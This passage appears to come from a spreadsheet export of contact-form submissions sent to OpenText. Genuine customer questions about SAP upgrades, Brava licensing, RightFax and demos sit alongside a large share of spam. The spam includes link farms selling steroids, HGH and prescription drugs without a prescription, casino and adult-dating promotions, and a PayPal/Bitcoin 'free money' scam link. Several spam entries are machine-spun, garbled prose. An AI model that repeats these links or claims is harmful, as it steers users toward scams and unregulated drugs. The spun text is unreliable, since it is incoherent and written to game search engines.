we are upgrading one of our SAP IDES systems used for demoing for our customers. The IDES system has pre- installed add-ons like OpenText Employee File Management for SAP Solutions. To proceed with the upgrade, we are prompted that file OTEXEIM0350_605.SAR is missing. _x000D_
Unfortunately, we don't have access to this ACP (attribute change package) on the SAP Service Market Place Softwarecenter, nor via the SAP Download manager._x000D_
_x000D_
Can you provide us the missing file?_x000D_
_x000D_
Many thanks &amp; best regards,_x000D_
_x000D_
Kevin</t>
  </si>
  <si>
    <t xml:space="preserve">Hi ,_x000D_
_x000D_
Hope your day is going wonderfully._x000D_
_x000D_
I would like to connect with you regarding our IT database this quarter._x000D_
We have detailed database of “Senior IT Professionals, CAD/Automation support professionals” across various States in USA. _x000D_
_x000D_
If you are interested, let’s get connected! Please let me know your complete data criteria and I will revert with few samples!_x000D_
_x000D_
•	Job Titles: _x000D_
•	Industry (if any):_x000D_
•	Geography: _x000D_
_x000D_
I look forward to hearing from you on this!_x000D_
_x000D_
Sincerely, _x000D_
-Evie Clair _x000D_
Marketing Consultant_x000D_
Evie@ansolutionstech.com || AN Technology Solutions_x000D_
</t>
  </si>
  <si>
    <t>I am looking for a contact in Legal that I can send an assignment letter to.  Does OpenText Legal have a general e-mail?  Please advise.  Thanks,_x000D_
_x000D_
Al</t>
  </si>
  <si>
    <t xml:space="preserve">To get the approval to buy on demand training, I need a list of courses included in "9-9900 OpenText Learning On Demand" related to Content Suite - EDRMS._x000D_
Could you polease let me know how I can get the list for the courses included in this package._x000D_
Regards,_x000D_
Sohrab Ghaffari_x000D_
</t>
  </si>
  <si>
    <t>Hi, I have requested to participate in the Innovation Tour event in Stockholm on Friday but have not received a confirmation._x000D_
Could you confirm that I have been registered.?_x000D_
It could also be under the company XSR Sweden AB._x000D_
_x000D_
Thank you,_x000D_
Mika</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://lastnewstoday.ru/pr/adult][img]http://lastnewstoday.ru/pr/adult/images/9068b248538e.jpg[/img][/url] _x000D_
 _x000D_
[url=http://lastnewstoday.ru/pr/adult]знакомства с женщинами[/url] _x000D_
 _x000D_
Онлайн сообщество знакомств с целью интимных встреч. лучшие встречи с противоположным полом для удовлетворения фантазий в твоем городе. Не проходи мимо - не останешься равнодушным! _x000D_
 _x000D_
 сайт табор знакомства версия, знакомства петропавловском, знакомства в воронеже без регистрации бесплатно, знакомство без майла, знакомства челябинск без, знакомства в гомеле, гей знакомства без, знакомства екатеринбург бесплатно, секс знакомства челябинск, знакомства девушками г, сайт знакомств красноярск, сайт знакомств круг, секс знакомства саратов, сайт знакомств кому за 50, знакомства подольск, интим знакомства регистрация, искать сайт знакомств, секс знакомства казань, время знакомства, loveplanet сайт знакомств, самые лучшие знакомства, знакомства в омске без регистрации, знакомство на ночь телефоны, сайт знакомств табор мобильная версия, яндекс знакомства, план знакомство, конспект знакомство с классом, друг вокруг знакомства регистрация, красивые знакомства, занятие знакомство с группой, сайт знакомств москва для серьезных отношений бесплатно, знакомства с богатыми женщинами, сайт знакомств уфа, знакомства с военными для серьезных, знакомства в возрасте, секс со знакомством, бесплатно знакомства город, интим знакомства без регистрации, сайт знакомств в минске, баду сайт знакомств на русском, самые популярные сайты знакомств _x000D_
</t>
  </si>
  <si>
    <t>Bonjour, _x000D_
_x000D_
Nous souhaiterions mettre en place un site intranet. Serait-il possible d'avoir une demo ? Pourrions-nous échanger sur le sujet ?_x000D_
_x000D_
Je reste joignable sur mon adresse mail._x000D_
_x000D_
Merci, _x000D_
_x000D_
Bien cordialement,_x000D_
Isma Belkacem</t>
  </si>
  <si>
    <t>causes of erectile dysfunction _x000D_
[url=http://edpillsdrugs.com/]erectile dysfunction drugs[/url] _x000D_
compare erectile dysfunction medication _x000D_
&lt;a href="http://edpillsdrugs.com/"&gt;herbs for erectile dysfunction&lt;/a&gt;</t>
  </si>
  <si>
    <t>Hi, I'm currently using Hummingbird Bi/Query V8.51 and would like to upgrade. Thanks.</t>
  </si>
  <si>
    <t xml:space="preserve">Good Afternoon,_x000D_
_x000D_
We have been using the free version of Brava reader for some time now and have been made aware that we will have to purchase the software to carry on using it from April 18th. We see there are many options and are unsure as to what suits us best, we only need to use pdf files and measure/scale from them. What would be the best option? Thank you._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello!_x000D_
_x000D_
	Hope you're doing great. We're updating our ISVs inventory, and would like some release planning information about your product HP Dialogue. We have currently installed the below listed versions:_x000D_
_x000D_
HP Dialogue V25048_x000D_
HP Dialogue V30021_x000D_
HP Dialogue V35022_x000D_
HP Dialogue V40601_x000D_
HP Dialogue V61008_x000D_
HP Dialogue V70601_x000D_
HP Dialogue V70616_x000D_
HP Dialogue V80313_x000D_
HP Dialogue V80326_x000D_
_x000D_
	_x000D_
	Would you kindly tell us if:_x000D_
_x000D_
1. Our currently installed releases have an estimated end of support date?_x000D_
2. There's any newer version or release generally available (GA)? If no, is there any newer version or release expected to go GA within next 6 months?_x000D_
_x000D_
Thank you very much in advance._x000D_
_x000D_
Warm regards,_x000D_
Nicolás Esteban Olmedo_x000D_
_x000D_
IBM GTS Services Delivery Center Argentina _x000D_
MVS System Programmer_x000D_
_x000D_
Hipolito Yrigoyen 2149  Modulo 'A'  Piso 1_x000D_
B1640HFG - Martinez - Argentina_x000D_
E-Mail: olmenies@ar.ibm.com </t>
  </si>
  <si>
    <t>solutions to erectile dysfunction _x000D_
[url=http://edpillsdrugs.com/]cheap ed drugs[/url] _x000D_
erectile clinics cleveland _x000D_
&lt;a href="http://edpillsdrugs.com/"&gt;erectile enhancement pills&lt;/a&gt;</t>
  </si>
  <si>
    <t>How to download software?</t>
  </si>
  <si>
    <t>Hello I went to place an order for a training class and realized it did not have the add to cart button...Can you help out?</t>
  </si>
  <si>
    <t>Buenas tardes,_x000D_
Nos gustaría mantener un contacto directo con algún comercial para que le pudiéramos trasladar los requerimientos que nos han surgido y ver cómo los productos de OpenText nos podrían ayudar a satisfacerlos._x000D_
Muchas gracias!</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.osyseg.com/img/nothing.asp?poor=76-Hgh-Biotropin-Hygetropin-Avis-Hgh-Cycle]Hgh Biotropin[/url]_x000D_
 To save lots of at restaurants with coupons, make sure to look at the small print before heading out to consume. You might have a 25 % away from discount, but be sure that it's not limited by, say, Sunday afternoons or Tuesday times. This could save you from an embarrassing minute when the verify will come._x000D_
  [url=http://www.ztsm.ru/images/template.php?e=432-igtropin-price-in-india-growth-hormone-injection-pain-igf-1-supplement.html]igtropin price in india[/url]_x000D_
 If you are searching for a simple way to obtain a brighter, happier laugh, then you should attempt making use of teeth bleaching pieces. These pieces certainly are a convenient method to get your smile hunting fantastic because they are so simple to operate. These strips consist of peroxide, which help to clean the surface of your respective pearly whites._x000D_
  [url=http://bistech.vn/class/editor.asp?p=83-jintropin-us-reviews-jintropin-china-buy-igtropin-benefits]jintropin us reviews[/url]_x000D_
 Employ weblog web directories to advertise your blog. Ensure you article your site into a number of databases that are related to your niche. This can be a wonderful way to promote your internet site and will assist you to get a huge amount of targeted traffic to your web site very quickly whatsoever._x000D_
  [url=http://www.cuandovincentconocioafrida.com/img/banner.asp?cat=424-Comprare-Viagra-A-Roma-Cialis-Originale-Lilly-Viagra-Online-Forum]Comprare Viagra A Roma[/url]_x000D_
</t>
  </si>
  <si>
    <t>[url=http://www.sparklabs.com.mx/esed/template.php?wc=598-Mesterolone-Reddit,Anavar-Oxandrolone-For-Sale-Uk,Methandienone-Price-In-Usa/]Mesterolone Reddit[/url]_x000D_
 A useful technique for working with ringing in the ears would be to reduced the worries ranges in your life. When people turn out to be tense or stressed, they have a tendency to concentrate more on their tinnitus. Some strategies that are valuable in stress special discounts are biofeedback, deep breathing, and physical activity. Getting adequate sleep each night also can help in reducing stress._x000D_
  [url=http://www.pknstavoren.nl/wp-content/session.php?xqxu=139-Boldenone-Uk-Muscle-Oxymetholone-Powder-For-Sale-Testosterone-Powder-Source]Boldenone Uk Muscle[/url]_x000D_
 Search for a free banking account, because there is no reason to squander funds needlessly. Get something that has no minimal harmony prerequisite, no purchase costs and no monthly fees. The vast majority of banks nonetheless supply free of charge, no attention examining profiles. Other folks have checking credit accounts which can be totally free when you join straight down payment._x000D_
  [url=http://www.whlytz.com/wp-content/new.php?p=1090-Stanozolol-Steroid-Australia,Methandienone-China,Oxymetholone-Manufacturer]Stanozolol Steroid Australia[/url]_x000D_
 Do some investigation and don't just count on the news. Some news records consist of beneficial details about the stock exchange but that info is not always correct, and in many cases it is really not offered in the simplest way. Should you your research as well as playing information content articles, you possibly can make confident you have all of the information prior to, buying and selling choices. This really is the best way to turn out to be a specialist in the stock exchange and incredibly see a robust degree of achievement._x000D_
  [url=http://www.profm.vn/wp-content/uploads/fister/template.php?t=1406-Testosterone-Propionate-Half-Life-Oxandrolone-Uk-Testosterone-Isocaproate-Uses/]Testosterone Propio</t>
  </si>
  <si>
    <t>Hello_x000D_
I have a customer who is requesting a quote. Can you please call me to discuss_x000D_
Thanks Jolie</t>
  </si>
  <si>
    <t>I am looking to verify information provided from my staff about the cost to buy Brava.  Our Craig Williams has been in touch with you about the cost, but I cannot place my finger on the info he provided me.  I believe the cost he referenced was about $50/user, maybe even $48.  Is this for Brava Viewer or Brava Reader?  I don't know the difference. If we make the decision to purchase the software, how long does it take activate it?  What documentation will you need? I presume we wouldn't have all names at one time, so I expect that I would have several names at the beginning.  I am shepherding this request up the chain, and I want to make sure I can explain all the issues._x000D_
_x000D_
Thanks,_x000D_
Rick Sasse</t>
  </si>
  <si>
    <t>Dear all,_x000D_
We are using one of Open Text products ICC Validation tool, and we would like to contact someone who could help us improve this application to receive better results with it._x000D_
_x000D_
Many thanks,_x000D_
Rihards Jegermanis</t>
  </si>
  <si>
    <t>Interested in a Forms solution to include generation, maintenance and attachment rules for our in house Policy Administration solution</t>
  </si>
  <si>
    <t>Bonjour, Nous devons faire évoluer notre plateforme Rightfax avec les étapes suivantes :_x000D_
1. Patcher 10.6 FP1 vers 10.6 FP1 SR3 _x000D_
2. Mise à jour vers 10.6 FP2, puis patch vers 10.6 FP2 SR4 ou upgrade vers 10.6 FP3, puis patch vers 10.6 FP3 SR5_x000D_
3. Upgrade vers 16.2_x000D_
_x000D_
Nous sommes à la recherche d'une société. Auriez-vous des coordonnées d'une société française ?_x000D_
_x000D_
D'avance merci._x000D_
_x000D_
Philippe Woerth</t>
  </si>
  <si>
    <t>slot online _x000D_
[url=http://casino24list.com/]online gambling casino[/url] _x000D_
&lt;a href="http://casino24list.com/"&gt;best online casino&lt;/a&gt; _x000D_
kasino</t>
  </si>
  <si>
    <t>Iwasawa celebrates 33rd by working with personal reveal_x000D_
_x000D_
picture while George SakkestadCampbell musician and performer Lorraine Lawson and simply Iwasawa asian Art boss Kumiko Iwasawa include plastered proper here with the help of four among Lawson s enso eliptical is fine mobile. Lawson is truly eight animators whose work is [url=https://www.appbrain.com/dev/Qpid+Network/]Qpid Network[/url] within the gallery s 33rd annual show your breaks on november. 1. nowhere roconnecteded getting started ended up engineered better 30 issue to present vendor Kumiko Ienjoyawa japoneses way of life to take when and los to Gatans. people has the potential to discovery everyone Iwasawa possesses the actual gdemonstrateery 33rd annual, tranny, chasing nov. 1 30._x000D_
_x000D_
a free office reception for the fans was scheduled for november._x000D_
_x000D_
the particular annual reveal delivers works by eight painters, who all application calligraphy, photography and therefore cardstock to share her principles._x000D_
_x000D_
ones own modern occurs are hands down commingled as well as older binoculars, maybe a 19th century Rimpa look lacquer page box that includes a deer pattern with this report discuss. Iwasawa states that the fresh new and therefore unused fit okay as partners mainly nippon story they provided art work which influenced created by prime works of art. similarly elaborated on the meaning of the display title, transmitting. the japanese an image habitually speaks of a specialized text; [url=https://www.youtube.com/watch?v=f0upJfcM8LY]qpid network[/url] perhaps holiday because,since auspicious, she or he shown. at which we transfer things with an set up we try to show one correspondence, which can include living long and it could be joy. louise Elliott Letterman, in whose business are at 358 hamlet isle throughout the shedd Gatos, experienced been trying to share information in of women boots anytime your lady came joining onto the 21st Century Stiletto. that represents, among other things, your 3 inch e</t>
  </si>
  <si>
    <t xml:space="preserve">Is there an agenda/schedule for Friday’s event? What kind of people are attending? </t>
  </si>
  <si>
    <t>Do you have an integration approach for documentum into MongoDB?</t>
  </si>
  <si>
    <t xml:space="preserve">Guten Tag,_x000D_
1. wir benötigen Unterstützung beim Upgrade unser Version auf eine aktuelle Version._x000D_
2. wir benötigen Unterstützung bei der Einführung eines weiteren Achivierungsworkflows für Non-SAP Dokumente._x000D_
3. wir brauchen ev. weitere Projektleistungen bei der Einrichtung der Arbeitsplätze vor Ort._x000D_
Danke_x000D_
Lars Kier_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.webgecko.nl/nico/academia.php?up=297]growth hormone pills[/url]_x000D_
 Money of numerous nations around the world is exchanged throughout the foreign exchange market place. The foreign currency market is constantly available, except for the weekends. Without the effort of diligent forex traders operating 24 hours a day, the industry can be in trouble. If you want to be a fx trader, then keep to the advice in the following paragraphs._x000D_
  [url=http://www.hrust.si/cache/document.php?option=139]Kigtropin Hgh Reviews[/url]_x000D_
 Give attention to how you will plan to take care of connections as you're planning a web site. Do you have a shout box on the webpage? You might have a online community or some sort of chat space. At a minimum, however, you have to have some technique where a visitor can get in touch with you. You are unable to keep shut-off from connection._x000D_
  [url=http://www.dmgeventspecialist.com/librarie1s/world.php?put=1644-Trenbolone-Steroid-Price-In-India-Nandrolone-Steroids-Trenbolone-Acetate-Powder-Suppliers/]Trenbolone Steroid Price In India[/url]_x000D_
 To completely value search for insurance you have to get estimates from different sources of information. The Net might appear easiest, but this may also be piled toward some service providers. Also check with a neighborhood independent broker with a few personal connections and partnerships. There's also no shame when making a couple of calls. These possibilities might arrive figures and sales opportunities that a internet site server won't offer you._x000D_
  [url=http://www.grupojarbet.com/wordpress/session.php?swit=920]Oxymetholone Raw Powder[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.cuzdantoka.com/catalog/test.php?lz=Igf-1-Hormone-Buy-Real-Kigtropin-Igtropin-For-Sale-295]Igf 1 Hormone[/url]_x000D_
 Be sure to understand the hazards of your method. No surgical treatment is without having threats, and that includes plastic surgery. Ask your personal doctor to clarify those to you, and do your own personal investigation at the same time. This can help you be ready if an unforeseen negative result should be the outcome. If you are not comfortable with the quantity of danger you are adding oneself in, you should reconsider the surgical procedures._x000D_
  [url=http://www.riverlakere.com/Library/green.php?g=7/]Kamagra 100mg Kopen[/url]_x000D_
 Ladybugs are not only adorable insects, but in fact are advantageous for your home gardens. They eat insects known as aphids which are popular for doing damage to the stems leaving of your plants. Having a restricted number of ladybugs within your backyard can help keep the aphid human population at bay._x000D_
  [url=http://www.vto43.ru/wp-includes/confuse.php?k=141-Igf-1-Lr3-Dosage-Hygetropin-Forum-Ormone-Della-Crescita-Basso]Igf 1 Lr3 Dosage[/url]_x000D_
 Try your very best to remain inside 30 percentage of the credit score reduce which is set on the greeting card. Element of your credit history is comprised of evaluating the quantity of financial debt that you have. By keeping yourself far below your restriction, you may assist your score and make sure it does not start to drop._x000D_
  [url=http://www.paroles.co.il/Scripts/error.php?qq=36-Kigtropin-Italia,Jintropin-Gensci,Igtropin-Injection.html]Kigtropin Italia[/url]_x000D_
</t>
  </si>
  <si>
    <t>Morning, Sorry to say but I'm not able to join the meeting  in Amsterdam on Wednesday 18/4/2018 due to work related issues. I wish OpenText a good meeting and I hope to see/meet you next time._x000D_
Regards,_x000D_
Henk Broos</t>
  </si>
  <si>
    <t xml:space="preserve">Dobrý den,_x000D_
_x000D_
mé jméno je Aleš Blaha a zastupuji společnost BMW Group v otázkách korporátního prodeje na území České republiky. _x000D_
_x000D_
Jelikož společnost Open Text patří mezi nejvýznamnější společnosti na českém trhu a zároveň má platný mezinárodní kontrakt s BMW AG v Mnichově, rádi bychom s vámi navázali bližší spolupráci. _x000D_
_x000D_
Pokud budete mít zájem, rádi bychom vás navštívili a pobavili se o možnostech BMW pro vaši společnost. _x000D_
_x000D_
Budete-li mít zájem o osobní schůzku, navrhněte prosím několik možných termínů. _x000D_
_x000D_
Těším se na vaši odpověď a přeji hezký den,_x000D_
_x000D_
Aleš Blaha_x000D_
_x000D_
BMW Group Czech Republic_x000D_
Aleš Blaha_x000D_
Key Account Manager_x000D_
Corporate and Special Sales_x000D_
Metronom Business Center_x000D_
Bucharova 2817/13_x000D_
158 00 Praha 5 Czech Republic _x000D_
</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I have question about Exceed. I`ve check license agreement in Exceed 2006 and 8.0 and i found we may not transfer of sublicense to others. And my question is what if new company is seperated from our company can we it that case transfer license ?_x000D_
_x000D_
Best Regard_x000D_
_x000D_
Paweł</t>
  </si>
  <si>
    <t>Which Brava Reader product should we buy in order to be able to view and measure on .pdf files? We need 6 single user licences. _x000D_
When I look at you information I get a bit confused. It is perhaps a litte ambiguous. Description of Brava! Desktop TX versus Brava! Desktop TX-N._x000D_
_x000D_
Is it possible to measure with the Brava! Desktop TX?_x000D_
_x000D_
Thank you, Tobias</t>
  </si>
  <si>
    <t>Not Able to access Mysupport (Product details, knowledge base, forum). I had access earlier but recently not able to access Mysupport. Please grant an access again.</t>
  </si>
  <si>
    <t xml:space="preserve">Can we arrange a demo of OpenText Media management DAM solution? _x000D_
We are currently evaluating DAM providers and would ideally like to arrange a demo and ask some questions some time this week. </t>
  </si>
  <si>
    <t>Elon Musk doesn’t shy away from comparing space to the Wild West, and sometimes his space missions sound like they’ve been pulled from the pages of a John Wayne script. On Monday, SpaceX will launch NASA’s Transiting Exoplanet Survey Satellite (TESS) for what is being called a “planet-hunting” mission. _x000D_
 _x000D_
NASA held three live briefings on Sunday to explain the ways in which TESS will be different from its planet-hunting predecessor, Kepler. TESS is expected to catalog thousands of potential planets and vastly increase the number of known exoplanets, or planets that orbit stars other than the sun. _x000D_
 _x000D_
TESS at the  Kennedy Space Center in Florida _x000D_
 _x000D_
At the first briefing on Sunday, Jesse Christiansen, staff scientist with the NASA Exoplanet Science Institute at Caltech, explained TESS’s three-pronged approach of exoplanet detection, characterization, and evidence of biosignatures. Christiansen, as well as the eight other scientists and representatives who spoke at the briefing, all stressed the diversity of the exoplanets, many of which hold traits that have not been seen before. Some exoplanets are between the size of Earth and Neptune, placing them in a new size category. These planets can vary in types of atmosphere and can be made of ice, rock, gas, or even something new. Christiansen said she wouldn’t rule out the existence of a “water planet,” driving home the notion that the possibilities are endless for this planet-hunting mission. _x000D_
 _x000D_
TESS will be using cameras with 16.4-megapixel imaging units which can cover 24-degree segments of the sky at once. The satellite will spend 13.7-day orbits observing a segment before moving on to the next segment. When finished, its expected to have checked 85 percent of the visible sky on its planet-hunting mission. That data will then be sent to NASA and MIT for careful vetting, which, according to TESS scientist Elisa Quintana, will be the biggest hurdle in discerning stars from planets and assessing their characterist</t>
  </si>
  <si>
    <t xml:space="preserve">please add me to you news letter, im looking for courses, seminars and workshops and also free sessions </t>
  </si>
  <si>
    <t xml:space="preserve">Bonjour dans le cadre d'une étude de cadrage je souhaiterai avoir des informations concernant votre solution type : livelink. _x000D_
a savoir quel est la stratégie cloud et également l'intégration avec SharePoint online est elle possible._x000D_
Demande assé urgente dans l'attente de votre retour ._x000D_
_x000D_
cordialement_x000D_
</t>
  </si>
  <si>
    <t>We currently reviewing our EDRMS SharePoint based system. We would like to have a demo to assess your solution please.</t>
  </si>
  <si>
    <t>смотреть фильмы в качестве 720 hd [url=http://kinoset.online/film/13134]Небесный замок Лапута[/url]</t>
  </si>
  <si>
    <t>фильмы в отличном качестве [url=http://kinoset.online/film/5649]Тайны школьного двора онлайн[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.videmark.dk/access/company.php?router=Stanozolol-Uk-Law-Clomiphene-Citrate-Suppliers-Trenbolone-Enanthate-Generic-1097/]Stanozolol Uk Law[/url]_x000D_
 If your credit score is not really very low, look for a credit card that is not going to charge numerous origination fees, especially a pricey yearly fee. There are many a credit card around that do not demand a yearly fee. Locate one available began with, within a credit score partnership which you feel relaxed using the cost._x000D_
  [url=http://www.peddleyourpaper.com/images/test.php?gd=147-Kigtropin.Co.Uk-Reviews-Jintropin-Gensci-Human-Growth-Hormone-For-Sale-Australia]Kigtropin.Co.Uk Reviews[/url]_x000D_
 Conduct Search engine optimisation on your portable platform. Focus on Google first since this is the online search engine which is used to do nearly all cellular search queries. Also work on spot-centered web pages since search engine rankings differ based upon where a end user can be found. Start with performing Search engine optimisation on conditions relevant to your company, and department out of there._x000D_
  [url=http://www.riversidenursery.co.za/state.php?bn=409-igf-1-lr3-for-sale,ansomone-100iu-kit,riptropin-dosage]igf-1 lr3 for sale[/url]_x000D_
 Reuse rain drinking water. This can be achieved employing a rainfall barrel mounted on a bad weather chain or strain spout. You are able to reuse this drinking water to drinking water your backyard or grass, complete a birdbath and even scrub your microsoft windows. Many people utilize it in their house also to flush toilets._x000D_
  [url=http://www.singwall.com.sg/canadapost/world.php?see=Trenbolone-Steroid-Cycle-China-Steroid-Powder-Methenolone-New-Zealand-1641/]Trenbolone Steroid Cycle[/url]_x000D_
</t>
  </si>
  <si>
    <t>Want my number removed from the fax list as my cell phone has no way to receive a fax.</t>
  </si>
  <si>
    <t>We are the IT/SI company and looking for the vendor to explore ECM market here in Nepal for mutual benefit. Pl connect with the relevant tesm for the further discussion.</t>
  </si>
  <si>
    <t>просмотр фильма бесплатно в хорошем [url=http://kinoset.online/?year=2017]фильмы 2016 2017 список лучших фильмов[/url]</t>
  </si>
  <si>
    <t>casino slots _x000D_
[url=http://casino24list.com/]cassino[/url] _x000D_
&lt;a href="http://casino24list.com/"&gt;online casino&lt;/a&gt; _x000D_
cassino</t>
  </si>
  <si>
    <t>Hi! _x000D_
 _x000D_
You can get $ 16 on your PayPal right now. Nothing complicated. _x000D_
Just look at the money you have in a minute. _x000D_
This is a new offer from Bitcoin =)  [url=http://unic.io/uZ7J0o] This page[/url] _x000D_
 _x000D_
[url=https://bitcoingolde5.top] Free Bitcoin.Mining Bitcoin.Bitcoin news.l[/url]</t>
  </si>
  <si>
    <t>I'd like to learn more about Magellan.   In particular, can Magellan be used to retrieve information from web sources?   Or do we have to already house the material to be analyzed in-house?</t>
  </si>
  <si>
    <t>online casino slots _x000D_
[url=http://casino24list.com/]slot online[/url] _x000D_
&lt;a href="http://casino24list.com/"&gt;online casino games&lt;/a&gt; _x000D_
casino games slots</t>
  </si>
  <si>
    <t xml:space="preserve">cialis prescriptions_x000D_
 [url=http://viagrawithoutdoctorus.net]viagra without a doctor prescription[/url]  generic cialis pills online usa_x000D_
 &lt;a href="http://viagrawithoutdoctorus.net"&gt;viagra without a doctor prescription&lt;/a&gt; - ajanta apcalis cialis cialis levitra_x000D_
 buy cialis online msn messenger_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.smpn4tangsel.sch.id/asmanabnur/back.php?love=1389]Testosterone Powder Wholesale[/url]_x000D_
 Lifestyle carries a humorous means of demonstrating that the things you thought you recognized wasn't really appropriate at all. Growing older means acquiring more intelligent, but most individuals still have no idea much at all till they've lived by way of it and will use hindsight. Be proactive instead of reactive as you may age group. Use these growing older ideas to discover the procedure._x000D_
  [url=http://www.aromatica.hr/Data/backup.php?ph=29-Jintropin-online.Com-Erfahrungen,Riptropin-Hgh,Hgh-Kaufen-Legal.html]Jintropin-online.Com Erfahrungen[/url]_x000D_
 In case you are replacing light bulbs within your house, make sure that you swap them compact luminescent lighting fixtures (CFLs). These lights use a small fraction of the electricity that conventional incandescent light bulbs use, plus they give off just as much light-weight. They price practically up to traditional lamps, and definitely will usually last many times longer._x000D_
  [url=http://www.topcup.rs/gdepopiti/media.php?io=3-Buy-Jintropin-Canada-Kigtropin-Hgh-Uk-Human-Growth-Hormone-Injections-Uk.html]Buy Jintropin Canada[/url]_x000D_
 For those who have additional money in your financial budget, it will be easy to take into consideration enlisting the aid of a wedding coordinator. Make certain you consider numerous men and women prior to selecting one which will probably be handling the wedding. Also, inquire about the charging and fees which can be related to the planner so that you know upfront if you can afford to pay for their services._x000D_
  [url=http://www.whlytz.com/wp-content/new.php?p=645-Methandienone-Suppliers,Methenolone-Oral,Tadalafil-Supplier]Methandienone Suppliers[/url]_x000D_
</t>
  </si>
  <si>
    <t>kasino _x000D_
[url=http://casino24list.com/]slot game[/url] _x000D_
&lt;a href="http://casino24list.com/"&gt;casino games real money&lt;/a&gt; _x000D_
casinos online</t>
  </si>
  <si>
    <t>online casino _x000D_
[url=http://casino24list.com/]play casino games online[/url] _x000D_
&lt;a href="http://casino24list.com/"&gt;slot online&lt;/a&gt; _x000D_
best online casino</t>
  </si>
  <si>
    <t xml:space="preserve">I'm a Dubai based Information Manager working on a project with Basrah Gas and Shell. _x000D_
We use Documentum 6.8 at the moment. We are interested in exploring more recent EDMS offerings. Client is unsatisfied with the inability to review documents concurrently. </t>
  </si>
  <si>
    <t>Для того, чтобы провести отпуск в Греции, следует получить соответствующую документацию, подробнее читайте на сайте [url=http://gturs.com]gturs.com[/url]</t>
  </si>
  <si>
    <t>смотреть фильмы онлайн хорошего качества без регистрации [url=http://kinoset.online/?year=2017]лучшие фильмы 2017 года онлайн бесплатно[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.mikroantalya.com/Content/pear.asp?ugg=28-Somatropina-Comprar-EspaÃ±a-Jintropin-Comprar-Igf-1-Lr3-Resultados]Somatropina Comprar EspaÃ±a[/url]_x000D_
 You should make certain you are hiring a professional to help you with the search engine marketing and never someone who is just claiming as a skilled. You will find individuals who do not possess any coaching from a institution to do search engine optimization but declare that they could do anything about it._x000D_
  [url=http://www.cottleaf.com/css/session.asp?f=350-Levitra-Generico-Kamagra-Gel-Generico-Viagra-Farmacia-Prescrizione]Levitra Generico[/url]_x000D_
 Why get new backyard garden covers when you are able make use of aged quilts to cover plant life during the cold months time? Should you don't have older covers you can get applied versions at thrift stores at low costs. Use tomato cages to support the covers more than your plant life. Specific bricks or garden rocks enables you to retain the covers and straight down and insure excellent insurance coverage to your plants and flowers._x000D_
  [url=http://www.bazalt-vladimir.ru/cache/router.asp?f=58-Buy-Hygetropin-Uk-Jintropin-Hgh-Uk-Riptropin-Hgh-Price/]Buy Hygetropin Uk[/url]_x000D_
 Prior to taking that photo, be sure it is going to draw out the most effective with your subject matter! Get a feel for the backgrounds of all of your photos. Be aware of issues in close proximity and also in the distance. Also, use that eyesight of yours to see how color will contrast with the subject of your image. When the background subject don't mesh effectively, you ought to locate another area!_x000D_
  [url=http://www.kevin-pedersen.com/Images/noob.asp?pook=411]igf-1 lr3 peptide[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.ekapano.com/system/string.asp?uaaa=146-Riptropin-Results-Buy-Jintropin-Uk-Ansomone-Vs-Jintropin]Riptropin Results[/url]_x000D_
 Cigarette smoking is an additional thing making the trouble of obstructive sleep apnea a whole lot worse. It genuinely irritates the nasal passages and ensures they are enlarge. As a result this triggers the air passages to become somewhat impeded, generating inhaling and exhaling on vehicle pilot while you are in bed more difficult. Decreasing cigarette smoking out entirely is good, but even reducing the quantity you smoke may help._x000D_
  [url=http://www.aaybirligi.com/include/system.asp?tum=333]hgh injections online[/url]_x000D_
 You determine the schedule for your university! If your kids are getting a wonderful time actively playing mathematics online games, spend the maximum amount of time taking part in it as you desire. You should do your greatest to attempt to keep the youngsters interested and having enjoyable whilst discovering. Once discovering turns into a task, they may swiftly lose interest as well as the studying process will sluggish._x000D_
  [url=http://www.egevent.com/images/see.asp?cash=12]gensci jintropin 100iu kit[/url]_x000D_
 Become your child's asthma attack promoter, particularly in school. Numerous educational institutions have insurance policies set up that prohibit young children from transporting drugs about them. This may not be acceptable when it comes to an urgent situation rescue inhaler. Find out what steps you must acquire to make certain that your kids can access their medication when needed._x000D_
  [url=http://www.ecmaindia.in/css/export.asp?mpgid=159]Venta Cialis En EspaÃ±a[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.przewodnik.prusice.pl/plugins/green.php?option=151/]Ansomone 40 Iu[/url]_x000D_
 One idea to becoming a very good property owner is to ensure that you check the referrals of anybody you wish being a renter. Often folks can put on a good show and appear like they could be great renters when in truth they might create a lot of problems for you. Preferable to be safe than sorry._x000D_
  [url=http://www.ibrtec.org.br/file.php?p=39]Kamagra Bestellen Online[/url]_x000D_
 There will always be concerns springing up that you simply cannot respond to, and this is because there will always be something totally new going on within the industrial housing market. One thing that assists your prosperity rates are surrounding oneself with people which are more experienced than you are. This will make an abundance of solutions accessible to you._x000D_
  [url=http://www.esermutfakekipmanlari.com/images/state.php?ru=4-Buy-Jintropin-From-China-Buy-Jintropin-Human-Growth-Hormone-Buy-Ansomone-Online]Buy Jintropin From China[/url]_x000D_
 As stated in the beginning with this article, how you are wanting to beautify your nursery is most likely one of several top stuff on your mind while pregnant. Considering the variety of various ideas swirling around, it can be tough to nail across the best 1. Apply the recommendations using this post and you will be soon on your way designing the ideal nursery quickly.Assisting Your Carrying a child Go A Bit Smoother_x000D_
  [url=http://www.omkarinternationalschool.org/images/banner.php?p=63-Levitra-Original-GÃ¼nstig-Kaufen,Levitra-20mg-Preis,Levitra-Generika-20mg-Erfahrungen.html]Levitra Original GÃ¼nstig Kaufen[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Компания [url=http://mstore-nn.ru/]MachineStore[/url] обеспечивает производственные, строительные и торговые организации, а также домашних мастеров разнообразным инструментом, технологической оснасткой, сварочным оборудованием, бензомоторной техникой. Ассортимент предлагаемой нами продукции постоянно расширяется и на сегодняшний день составляет свыше 5000 наименований инструмента. _x000D_
Всегда в наличии:  _x000D_
